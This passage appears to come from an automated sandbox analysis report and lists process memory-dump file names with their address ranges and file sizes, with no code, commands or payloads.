                        • memory/3780-19-0x00000000004B1000-0x0000000000519000-memory.dmp

                          Filesize

                          416KB

                        • memory/3780-3-0x00000000004B0000-0x00000000007C5000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/3780-2-0x00000000004B1000-0x0000000000519000-memory.dmp

                          Filesize

                          416KB

                        • memory/3780-1-0x0000000077AA4000-0x0000000077AA6000-memory.dmp

                          Filesize

                          8KB

                        • memory/4876-173-0x0000000000040000-0x00000000006CE000-memory.dmp

                          Filesize

                          6.6MB

                        • memory/4876-170-0x0000000000040000-0x00000000006CE000-memory.dmp

                          Filesize

                          6.6MB

                        • memory/5408-614-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/5408-2036-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/5408-3899-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/5408-652-0x0000000010000000-0x000000001001C000-memory.dmp

                          Filesize

                          112KB

                        • memory/5408-729-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/5408-722-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/6068-526-0x0000000000040000-0x00000000002FC000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/6068-558-0x0000000000040000-0x00000000002FC000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/6068-557-0x0000000000040000-0x00000000002FC000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/6068-623-0x0000000000040000-0x00000000002FC000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/6068-648-0x0000000000040000-0x00000000002FC000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/6116-689-0x0000000000400000-0x000000000064B000-memory.dmp

                          Filesize

                          2.3MB